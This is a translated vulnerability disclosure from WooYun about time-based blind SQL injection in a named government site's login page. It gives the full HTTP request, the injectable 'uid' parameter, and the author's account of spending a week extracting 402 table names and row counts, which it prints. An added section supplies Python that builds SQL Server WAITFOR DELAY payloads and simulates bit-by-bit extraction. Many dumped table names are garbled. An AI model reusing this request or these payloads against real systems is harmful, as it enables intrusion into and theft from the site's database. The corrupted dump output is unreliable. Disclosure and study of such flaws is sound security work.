
Vulnerability summary

Defect ID: wooyun-2015-0113869

Title: Time-based blind SQL injection in a government internet business management system

Vendor: internet business management system of a communications administration

Author: 几何黑店

Submitted: 2015-05-13 13:28

Fixed: 2015-07-01 19:12

Published: 2015-07-01 19:12

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-13: details sent to the vendor, awaiting vendor response
2015-05-17: vendor confirmed; details visible to the vendor only
2015-05-27: details disclosed to core white hats and relevant domain experts
2015-06-06: details disclosed to regular white hats
2015-06-16: details disclosed to intern white hats
2015-07-01: details disclosed to the public

Brief description:

Ran it for a whole week and finally finished dumping all 402 tables. Time-based blind injection is the most tedious kind, argh.

Details:

POST /login.aspx HTTP/1.1
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://aq.gdca.gov.cn:80/
Cookie: ASP.NET_SessionId=12tih045ujfxxj55wpq4giij; skyInstitute=Iwin; __CanGuestLog__=__myiWIN__=10; skyship=119253558; http://aq.gdca.gov.cnIWIN=119253558
Host: aq.gdca.gov.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
anyWhereLogin=true&ddlInstitute=true&pwd=&uid=1&val=


Parameter: uid

[screenshot: QQ图片20150513115709.png]
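The probe behind this finding, as an added example that is not part of the original report: each request to `uid` asks the back end (the `dbo.` schema prefix in the dump and the ASP.NET front end point to Microsoft SQL Server) to `WAITFOR DELAY` only when one bit of one character of a queried value is set, so a tool reads the schema one bit per request and decides each bit from response time alone. The block below builds such a payload (the string-literal quoting context and the `sysobjects` query are assumptions; the report does not show the back-end SQL) and simulates the inference loop against a constructed target whose only observable is latency. It also shows why a week-long dump comes back with entries like `ApplyRighyA` next to `ApplyRigh`, or two `WBDB85` rows trailing garbage: when a latency spike is mistaken for the injected delay, a bit flips and the character is corrupted. Choosing the delay and the decision threshold from a measured baseline, which is what sqlmap's initial timing measurement is for, is what keeps that from happening.

```python
"""
Time-based blind SQL injection, one bit per request.

Added example: payload construction for the SQL Server back end implied by
the report, plus an offline simulation of the inference loop a tool such as
sqlmap runs. Nothing here talks to a network; the "target" is a constructed
model of a vulnerable endpoint whose only observable is response time.
"""
import itertools

DEFAULT_DELAY = 3                   # seconds requested by WAITFOR DELAY
BITS = (64, 32, 16, 8, 4, 2, 1)     # 7-bit ASCII, most significant bit first


def mssql_payload(pos: int, bit: int, delay: int = DEFAULT_DELAY) -> str:
    """Value for the injectable `uid` parameter. The quoting context (a string
    literal closed with ') is an assumption; the report does not show the
    back-end query. The server sleeps only if bit `bit` of character `pos` of
    the first user table's name is set, so each request leaks exactly one bit."""
    return (
        "1' IF (ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects "
        "WHERE xtype='U' ORDER BY name),%d,1)) & %d) > 0 "
        "WAITFOR DELAY '0:0:%d'--" % (pos, bit, delay)
    )


class SimulatedTarget:
    """Constructed stand-in for the vulnerable endpoint.

    probe() returns the response time a request carrying
    mssql_payload(pos, bit, delay) would take: `delay` seconds if the bit is
    set, plus whatever network latency the constructed `latency_profile`
    adds (cycled request by request)."""

    def __init__(self, secret: str, latency_profile=(0.0,)):
        self.secret = secret
        self._latency = itertools.cycle(latency_profile)
        self.requests = 0

    def probe(self, pos: int, bit: int, delay: float) -> float:
        self.requests += 1
        # SUBSTRING past the end of the value yields an empty string, whose
        # ASCII() is NULL: no bit is ever set, which is how the reader stops.
        ch = self.secret[pos - 1] if 1 <= pos <= len(self.secret) else "\0"
        sleep = delay if ord(ch) & bit else 0.0
        return sleep + next(self._latency)


def calibrate(target: SimulatedTarget, samples: int = 8):
    """Measure undelayed responses (pos=0 addresses no character, so the
    condition is always false) and choose a WAITFOR delay plus a decision
    threshold that clear the worst latency observed, with headroom."""
    noise = max(target.probe(0, 1, 0) for _ in range(samples))
    delay = max(DEFAULT_DELAY, int(2 * noise) + 1)
    threshold = (noise + delay) / 2
    return delay, threshold


def infer_char(target: SimulatedTarget, pos: int, delay: float, threshold: float) -> str:
    value = 0
    for bit in BITS:                      # seven requests per character
        if target.probe(pos, bit, delay) >= threshold:
            value |= bit
    return chr(value)


def extract(target: SimulatedTarget, delay: float = DEFAULT_DELAY,
            threshold: float = DEFAULT_DELAY / 2, max_len: int = 16) -> str:
    """Read characters until the NUL that a position past the end yields."""
    out = []
    for pos in range(1, max_len + 1):
        ch = infer_char(target, pos, delay, threshold)
        if ch == "\0":
            break
        out.append(ch)
    return "".join(out)


def demo():
    # Quiet link: a fixed delay/2 threshold is enough; 7 requests per character.
    quiet = SimulatedTarget("RZXX")
    clean = extract(quiet)
    # Bursty link (constructed): every third response carries a 2.5 s spike,
    # which a 1.5 s threshold mistakes for a set bit, corrupting characters.
    spiky = SimulatedTarget("RZXX", latency_profile=(0.1, 0.2, 2.5))
    naive = extract(spiky)
    # Same link, but delay and threshold chosen from a baseline measurement.
    spiky2 = SimulatedTarget("RZXX", latency_profile=(0.1, 0.2, 2.5))
    delay, threshold = calibrate(spiky2)
    calibrated = extract(spiky2, delay, threshold)
    return clean, quiet.requests, naive, calibrated, delay


if __name__ == "__main__":
    clean, n, naive, calibrated, delay = demo()
    print("quiet link        :", clean, "in", n, "requests")
    print("spiky, naive      :", repr(naive))
    print("spiky, calibrated :", calibrated, "with WAITFOR DELAY", delay, "s")
```

The request count is the reason the author's dump took a week: seven requests per character, the server deliberately stalled on every request whose bit is set, repeated for each of the 402 names. The second run shows the trade-off of shortening that wait: a threshold that sits inside the network's own jitter produces exactly the kind of mis-read names the list below contains, and the cure is a longer delay chosen from a baseline, not retries.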

Proof of vulnerability:

[screenshot: QQ图片20150513115920.jpg]


Database: gdca
[402 tables]
+---------------------------------------------+
| ACCESSARYISNRWPAGE |
| AccessorySet |
| AddrXX |
| Advertisement |
| AllSystemLog |
| AllSystemLsers |
| Answertable |
| ApplyFlow |
| ApplyItem |
| ApplyReply |
| ApplyRigh |
| ApplyRightHis䄄q䄄䄄A |
| ApplyRighyA |
| ApplyXX |
| Apply_Export |
| Apply_Expression |
| Apply_Search |
| Apply_keyvalue_formart |
| Asp_Info |
| Asp_Info_Copy |
| Asp_Items |
| Authorize |
| AutoNum |
| AutoNumLib |
| BBSXX |
| BDFlow |
| BDInformation |
| BDTemplate |
| BDXX |
| Banner |
| BasicGroup |
| BbsStatistics |
| BigExam |
| BookOrder |
| BugInfo |
| ButtonPosition |
| ButtonStyle |
| CHECK_LEGALFILE |
| CPNDITION_STYLE |
| Chart_Base |
| Chart_Series |
| ChatService |
| ChatXX |
| CityID |
| CompanyArchi |
| ComplexNoset |
| Cost_Basic |
| Cost_Log |
| Cost_SetMenu |
| CrossSystem |
| CustomOperate |
| CustomapecialQuery |
| DBFieldDicttion |
| DBWJFoum |
| DBWJInteFace |
| DZXX |
| DataInterface |
| DbOutRecLlqg |
| DbTableContentq |
| DomainBdxx |
| DynamCompute |
| DynamContentEx |
| DynamicRightInfo |
| DynamicSearch |
| DynamicSearchItem |
| EasyExcelImport |
| EmailBox |
| EmailPop3 |
| EmailServer |
| Emailserverperson |
| EnemyLog |
| Enjoin_User_Group |
| ExAns |
| ExHisMainE |
| ExHit |
| ExLibAns |
| ExLibQueA |
| ExMain |
| ExQue |
| ExSub |
| ExamHistory |
| Examtable |
| FAX_ILLe |
| FAX_LIST |
| FRIEND |
| Fax_AppRegist |
| FileCenterSet |
| FileHcon |
| FileHelp |
| FileKeyWord |
| FileManageSub |
| FileManagg |
| FirstMenu |
| FirstPagi |
| FlexibleWebPart |
| Flow |
| FlowAssoImport |
| FlowAssociateDomain |
| FlowAssociateSet |
| FlowAssocqate |
| FlowInterface |
| FlowLib |
| FlowLibMain |
| FlowLibState |
| FlowLog |
| FlowMain |
| FlowOutSend |
| FlowReshtCondition |
| FlowRtate |
| FlowUnlockSet |
| FormPasselBuildInfo |
| FormPasselBuildSet |
| ForumManager |
| FunctionState |
| Gantt_Base |
| Gantt_Item |
| Gantt_Projectq |
| GroupPolicy |
| GroupSign |
| GroupSignLog |
| GroupSistemaet |
| Group_talkDetail |
| Group_talk_history |
| HolidayCalendcr |
| IMSkin |
| IMSkinUse |
| INSTITUDE |
| ImageSlide |
| ImportPrivDocInfo |
| InfoXX |
| InnerMail |
| IwieCorporation |
| LailSF |
| LessonContent |
| LessonManager |
| LestStyleSet |
| Lest_ViewTypeSet |
| MOBILE_BASEOPERATE_SET |
| MOBILE_LOGIN_SET |
| MOBILE_MENU_SET |
| MOBILE_POP3RECaAIL_SET |
| MOBILE_RECEIVEOUTMAIL |
| MailXX |
| MarkTitlqC |
| MultiMenu |
| NodeBonusRecord |
| NodeDirectBonusRecord |
| NodeState |
| NodeStateDefiue |
| Nodes |
| OUTMaILCONNSET |
| OUtMailSended |
| Onclick |
| OnherSysLog |
| OutSysInteFaceSet |
| OutSysInteFayeList |
| OutSysLink |
| OutSysLinkValidatqA |
| OutSystemGetValue |
| PhotqOfIco |
| Posicy |
| PricesyBeg |
| PrintHistoryA |
| PrivDocSub |
| QXXX |
| REPORT_ALIEN |
| REPORT_COLLECT_SdYLE |
| REPORT_COLtECT |
| REPORT_EXPORT |
| REPORT_EXPORT_SETTING |
| REPORT_EXPORT_SETTING_SEARCH |
| REPORT_EXPORT_TYPE |
| REPORT_FETTING |
| REPORT_FUNCTION |
| REPORT_SOURCE |
| REPORT_STYLE |
| REPORT_STYLE_aPP |
| REPORT_SUMMARY |
| REPORT_URL |
| REPORT_aORMULA |
| REPORT_qASEaA |
| RZXX |
| RZXXback |
| RZfePolicy |
| RecEmqilList |
| Resortaetail |
| RightInfo |
| SKIN_BottomOperateArqa |
| SKIN_FPS_GeneralSettings |
| SKIN_IM |
| SKIN_MaIN |
| SKIN_Mark |
| SKIN_NEMaNDICOSaT |
| SKIN_NavigatioqArea_Main |
| SKIN_NavigutionArea_Button |
| SKIN_TopShorycutMenu |
| SKIN_wEMINDPAGESET |
| SMSUrlSend |
| Scan_confiya |
| Scan_frequency |
| Scan_item |
| Scan_remind |
| Scan_type |
| SelectExam |
| Semantic |
| ShareDoc |
| Sms |
| Sms1 |
| SmsFyiend |
| SmsHistory |
| SmsHistory1 |
| SmsItem |
| SmsMultiCoqtent |
| SmsSenqA |
| SmsUserSeqd |
| SmsUzeNote |
| SmsbultiNote |
| SmyrceHolidayCalendara |
| SourceWqekCalendar |
| StatReportInqo |
| Statistqc |
| SysGroupDomain |
| SystemPhoto |
| SystemRegister |
| SystemRelation |
| SystqmImport |
| SystqmImtiyeA |
| TempApplyTitle |
| Template |
| TemplateLibrary |
| ThirdMenu |
| TimeView_syave |
| TimeYiew_main |
| TransferMain |
| TransferRule |
| TraqsferDetqil |
| TreeItqm |
| Upaile |
| UpaileInfo |
| UppqrLimit |
| UpqrAuthorize |
| UserGroup |
| UseraoginFix |
| V_FileUpload_User |
| V_FileUplord_Path |
| V_MailSF |
| V_mailXX |
| ViewMenu |
| ViewSlave_ImportToMain |
| WBDB75 |
| WBDB75a |
| WBDB82 |
| WBDB85 |
| WBDB91 |
| WBDB94 |
| WEedAbT |
| WGIMGMARKSET |
| WasteBook |
| WasteBookForqaA |
| WasteBookItem |
| WasteBookSumItem |
| Widqet |
| WorkPress |
| WorkReply |
| WorkTime |
| WorkTrack |
| WorkTrackSet |
| XTXX |
| XTXX |
| XsetupA |
| YGXX |
| YHXX |
| ApplyRighyq{ruce |
| Bbsx}_c\?81sInfo |
| CONDITION_STYLE_GROqPa |
| CoopXX |
| Cost_SubentryA |
| CrmEmail |
| DomainSet |
| FPS_ButtoဆW鸁Fs |
| FileManageConfigInfo |
| FlowCondotion |
| FlowCust\?97mUrl |
| FlowResortY |
| FormLiurar| r! |
| Fsl~~mLmny |
| FuxwLl鐅~X=e_+{PV,89f}$|.:3<.!L6*hf+K0cG} |
| Group_talk |
| HTMLPolicy! |
| InterfaceSkin |
| LYXX |
| LessonExam |
| LessonT}pe |
| MOBILE_aAINSCREEN_SET |
| MainSystemRelation! |
| NoteXX! |
| PrivDoc |
| QZXX |
| REPORT_DROPeOWN |
| RecErbish_Config |
| RelativeFilq |
| SKIN_ColumnTab |
| SKIN_MainOpeyateAreaqApA |
| SKIN_NavigationArea_Sh~rtCutButon |
| SecondMenu! |
| SmsMultiNoteReceivers |
| SmsRqceive |
| SmsUserReceive |
| SmsViewQ |
| SmsView\ |
| SqurceObject) |
| SqurceOype |
| SubjectClass! |
| TempGrouqA |
| TipMenu |
| Tree |
| TypeTable |
| UplHelpeㄅBa Q" |
| UploadaileLimit |
| UserPosition |
| UserRelation! |
| V_FileUpload_T}pe |
| V_notexx! |
| WBDB78!匇 |
| WBDB83A |
| WBDB84 |
| WBDB85팇ఇPQ a |
| WBDB85팇ఇ}@﬇xﴃy{*@0|a |
| WBDB93 |
| WGTitle |
| WasteBookSqowItem |
| WaterWeek! |
| Webatyle |
| WeekCaqndar |
| ZDXX |
| citytable |
| cysaroup |
| exportfile |
| inbox |
| outsiqeuser A |
| puqlicnotice! |
| sch_Schedule |
| surve}_answer |
| surve}_question |
| taq_DayRelation |
| web_for|h@1`AY<A |
| ws_EnqineMatch |
| yqbaysto\?81A%E9A'AQC# |
| alramLog |
| alramSet |
| applyMenuaist |
| attendance |
| backfile |
| backtask |
| baobiao |
| colleague |
| cpuntrytable |
| cysEryqrLog |
| defaultField |
| dtproperties |
| errorInfo |
| errorLog |
| errorProcess |
| excelimporttemp |
| file_table |
| filebook |
| firstpage_hb |
| formInfo |
| formLibInfo |
| formMenu |
| guest_register |
| imporysExcel |
| outbox |
| outer_asso_dtl |
| outer_asso_hdr |
| provincetable |
| sMSdistribute |
| sch_Note |
| sch_Relation |
| sch_Reqly |
| smallExam |
| smsBaseExpenditure |
| smsCat |
| smsMultiGroup |
| statReportDqtail |
| sys_info |
| sys_publicnotice |
| sys_web |
| tb_control |
| tb_history |
| tb_hueye |
| tb_schedule |
| vST |
| vdbResort |
| viewForm |
| viewSlaveForm |
| vqd |
| wastebqokFormIteqA |
| wgparyet |
| ws_Favorites |
| ws_Results |
| ws_Tasqs |
+---------------------------------------------+
Database: gdca
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.RZXX | 212632 |
| dbo.ApplyXX | 100661 |
| dbo.FlowAssoImport | 60336 |
| dbo.EnemyLog | 43921 |
| dbo.FlowLog | 34971 |
| dbo.ImportPrivDocInfo | 21734 |
| dbo.MailXX | 14532 |
| dbo.outbox | 14529 |
| dbo.UserGroup | 14110 |
| dbo.WBDB75 | 10622 |
| dbo.V_MailSF | 10000 |
| dbo.WBDB82 | 9945 |
| dbo.InnerMail | 9212 |
| dbo.sMSdistribute | 8203 |
| dbo.ApplyFlow | 6704 |
| dbo.colleague | 5866 |
| dbo.RightInfo | 5153 |
| dbo.OUtMailSended | 4322 |
| dbo.YHXX | 3008 |
| dbo.V_mailXX | 2000 |
| dbo.file_table | 1434 |
| dbo.ApplyItem | 871 |
| dbo.Scan_item | 757 |
| dbo.ThirdMenu | 720 |
| dbo.BDTemplate | 715 |
| dbo.Cost_Basic | 695 |
| dbo.formInfo | 691 |
| dbo.WBDB94 | 651 |
| dbo.defaultField | 594 |
| dbo.SmsHistory1 | 564 |
| dbo.WBDB85 | 541 |
| dbo.errorLog | 510 |
| dbo.REPORT_ALIEN | 507 |
| dbo.GroupSign | 467 |
| dbo.InfoXX | 396 |
| dbo.REPORT_SUMMARY | 342 |
| dbo.WasteBookItem | 342 |
| dbo.FlowMain | 310 |
| dbo.SystemPhoto | 258 |
| dbo.ws_Results | 242 |
| dbo.DynamicRightInfo | 239 |
| dbo.BasicGroup | 232 |
| dbo.SmsItem | 221 |
| dbo.vST | 198 |
| dbo.Flow | 186 |
| dbo.AddrXX | 179 |
| dbo.BDXX | 164 |
| dbo.outer_asso_dtl | 133 |
| dbo.ComplexNoset | 128 |
| dbo.V_FileUpload_User | 119 |
| dbo.outer_asso_hdr | 112 |
| dbo.viewSlaveForm | 96 |
| dbo.smsBaseExpenditure | 85 |
| dbo.WBDB91 | 82 |
| dbo.AutoNum | 75 |
| dbo.provincetable | 70 |
| dbo.WorkPress | 55 |
| dbo.EasyExcelImport | 53 |
| dbo.Cost_Log | 52 |
| dbo.REPORT_EXPORT_TYPE | 47 |
| dbo.NodeState | 41 |
| dbo.Semantic | 41 |
| dbo.viewForm | 40 |
| dbo.EmailServer | 38 |
| dbo.PrivDocSub | 38 |
| dbo.DZXX | 36 |
| dbo.CustomOperate | 32 |
| dbo.NodeBonusRecord | 24 |
| dbo.FirstMenu | 23 |
| dbo.excelimporttemp | 21 |
| dbo.IMSkinUse | 20 |
| dbo.Template | 19 |
| dbo.Asp_Info_Copy | 18 |
| dbo.WasteBook | 18 |
| dbo.BBSXX | 14 |
| dbo.Onclick | 13 |
| dbo.REPORT_SOURCE | 13 |
| dbo.AllSystemLog | 10 |
| dbo.firstpage_hb | 10 |
| dbo.SmsHistory | 10 |
| dbo.CompanyArchi | 9 |
| dbo.smsMultiGroup | 9 |
| dbo.WasteBookSumItem | 9 |
| dbo.Nodes | 8 |
| dbo.RZXXback | 8 |
| dbo.Apply_keyvalue_formart | 6 |
| dbo.Asp_Items | 5 |
| dbo.guest_register | 5 |
| dbo.TransferRule | 5 |
| dbo.[WBDB93] | 4 |
| dbo.MOBILE_MENU_SET | 4 |
| dbo.SystemRelation | 4 |
| dbo.WorkReply | 4 |
| dbo.ws_Favorites | 4 |
| dbo.ApplyReply | 3 |
| dbo.ButtonStyle | 3 |
| dbo.REPORT_URL | 3 |
| dbo.FileManageSub | 2 |
| dbo.ForumManager | 2 |
| dbo.INSTITUDE | 2 |
| dbo.Scan_frequency | 2 |
| dbo.Scan_remind | 2 |
| dbo.Scan_type | 2 |
| dbo.sys_publicnotice | 2 |
| dbo.vdbResort | 2 |
| dbo.[puqlicnotice!] | 1 |
| dbo.AccessorySet | 1 |
| dbo.Advertisement | 1 |
| dbo.alramSet | 1 |
| dbo.Asp_Info | 1 |
| dbo.Authorize | 1 |
| dbo.BookOrder | 1 |
| dbo.ChatService | 1 |
| dbo.ChatXX | 1 |
| dbo.DynamicSearchItem | 1 |
| dbo.EmailBox | 1 |
| dbo.Fax_AppRegist | 1 |
| dbo.FlexibleWebPart | 1 |
| dbo.formLibInfo | 1 |
| dbo.Group_talkDetail | 1 |
| dbo.GroupPolicy | 1 |
| dbo.IMSkin | 1 |
| dbo.MOBILE_BASEOPERATE_SET | 1 |
| dbo.MOBILE_LOGIN_SET | 1 |
| dbo.sch_Note | 1 |
| dbo.sch_Relation | 1 |
| dbo.SKIN_FPS_GeneralSettings | 1 |
| dbo.SKIN_IM | 1 |
| dbo.SKIN_MaIN | 1 |
| dbo.SKIN_Mark | 1 |
| dbo.sys_info | 1 |
| dbo.ViewMenu | 1 |
| dbo.WorkTime | 1 |
| dbo.WorkTrackSet | 1 |
| dbo.XTXX | 1 |
| dbo.XTXX | 1 |
+------------------------------+---------+

Remediation:

You know what to do.

Copyright notice: when reposting, credit the source as 几何黑店@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-05-17 19:10

Vendor reply:

Forwarded through CNCERT to the relevant branch center, which will coordinate handling with the unit that operates the site.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-05-13 13:29 | 疯子 (regular white hat | Rank: 242 | vulnerabilities: 42 | "The world laughs at me for being too mad; I laugh at the world for not seeing through")

    Time-based blind injection, hahaha.